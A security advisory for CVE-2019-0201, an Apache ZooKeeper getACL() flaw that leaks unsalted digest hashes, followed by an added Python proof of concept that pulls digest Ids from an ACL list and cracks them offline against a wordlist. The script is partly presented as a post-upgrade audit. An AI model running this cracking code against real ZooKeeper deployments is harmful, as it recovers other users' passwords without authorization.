List: oss-security
Subject: [oss-security] [CVE-2019-0201] Information disclosure vulnerability in Apache ZooKeeper
From: Andor Molnar <andor () apache ! org>
Date: 2019-05-20 17:15:24
Message-ID: 52C7AFA8-8CAB-4613-95E9-3EED492B9693 () apache ! org
CVE-2019-0201: Information disclosure vulnerability in Apache ZooKeeper
Severity: Critical
Vendor: The Apache Software Foundation
Versions Affected: ZooKeeper prior to 3.4.14, ZooKeeper 3.5.0-alpha through 3.5.4-beta. The unsupported ZooKeeper 1.x through 3.3.x versions may also be affected.
Description: ZooKeeper's getACL() command does not check any permission when it retrieves the ACLs of the requested node, and it returns all information contained in the ACL Id field as a plaintext string. DigestAuthenticationProvider overloads the Id field with the hash value that is used for user authentication. As a consequence, if Digest Authentication is in use, the unsalted hash value will be disclosed by a getACL() request to unauthenticated or unprivileged users.
Mitigation: Use an authentication method other than Digest (e.g. Kerberos) or upgrade to 3.4.14 or later (3.5.5 or later if on the 3.5 branch).
Credit: This issue was identified by Harrison Neal <harrison@patchadvisor.com> of PatchAdvisor, Inc.
References: https://issues.apache.org/jira/browse/ZOOKEEPER-1392
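The following is an added worked example, not part of the advisory or of the ZooKeeper code base. It reproduces the digest format that DigestAuthenticationProvider stores in the ACL Id field (the user name, a colon, and the base64 of an unsalted SHA-1 over the literal "user:password" string), shows what an unprivileged getACL() on a vulnerable server hands back for a digest-protected znode, and runs the offline dictionary guess that the disclosure makes possible. The ACL list, user name, password and wordlist are constructed for the example; the helper names (zk_digest, leaked_digest_ids, crack_digest_id, audit_getacl_response) are this example's own and do not exist in ZooKeeper or in any client library.

```python
import base64
import hashlib


def zk_digest(user_password: str) -> str:
    """Recompute the value DigestAuthenticationProvider puts in the ACL Id
    field: "<user>:" + base64(SHA-1("<user>:<password>")).

    There is no salt and no work factor, which is why disclosing this
    string through getACL() is equivalent to handing out a crackable hash.
    """
    user, _, _ = user_password.partition(":")
    raw = hashlib.sha1(user_password.encode("utf-8")).digest()
    return f"{user}:{base64.b64encode(raw).decode('ascii')}"


# Constructed example: the ACL list a client would receive from getACL()
# on a vulnerable server, as (perms bitmask, scheme, id) tuples.
# 31 == READ|WRITE|CREATE|DELETE|ADMIN; 1 == READ.
SAMPLE_ACLS = [
    (31, "digest", zk_digest("alice:hunter2")),  # hypothetical user/password
    (1, "world", "anyone"),
]

# Constructed wordlist for the offline guess.
WORDLIST = ["password", "letmein", "zookeeper", "hunter2", "changeme"]


def leaked_digest_ids(acls):
    """Pick out the Id strings of digest-scheme entries exactly as the
    vulnerable getACL() returns them to an unauthenticated caller."""
    return [entry_id for _perms, scheme, entry_id in acls if scheme == "digest"]


def looks_like_full_digest(entry_id: str) -> bool:
    """Heuristic check for use after an upgrade: a base64 SHA-1 is 28
    characters ending in '='. If an unprivileged getACL() still returns an
    Id matching this shape, the server is still disclosing the hash."""
    _user, sep, tail = entry_id.partition(":")
    if not sep or len(tail) != 28 or not tail.endswith("="):
        return False
    try:
        return len(base64.b64decode(tail, validate=True)) == 20
    except ValueError:
        return False


def crack_digest_id(leaked_id: str, wordlist):
    """Offline dictionary attack against one leaked Id: recompute the
    digest for each candidate password under the leaked user name and
    compare. Returns the password on a hit, None otherwise."""
    user, _, _ = leaked_id.partition(":")
    for candidate in wordlist:
        if zk_digest(f"{user}:{candidate}") == leaked_id:
            return candidate
    return None


def audit_getacl_response(acls, wordlist):
    """Map each digest user whose Id was disclosed to the recovered
    password (only users whose password is in the wordlist appear)."""
    recovered = {}
    for entry_id in leaked_digest_ids(acls):
        if not looks_like_full_digest(entry_id):
            continue  # patched server, or not a real digest Id
        password = crack_digest_id(entry_id, wordlist)
        if password is not None:
            recovered[entry_id.partition(":")[0]] = password
    return recovered


if __name__ == "__main__":
    print("getACL() disclosed:", leaked_digest_ids(SAMPLE_ACLS))
    print("recovered:", audit_getacl_response(SAMPLE_ACLS, WORDLIST))
```

On a real deployment the ACL list would come from a client call such as kazoo's get_acls() or the Java ZooKeeper.getACL(), issued without any addauth; feeding that result to audit_getacl_response with an empty or tiny wordlist is still a useful post-upgrade check, because looks_like_full_digest alone tells you whether the server is still returning the base64 digest to an unprivileged caller.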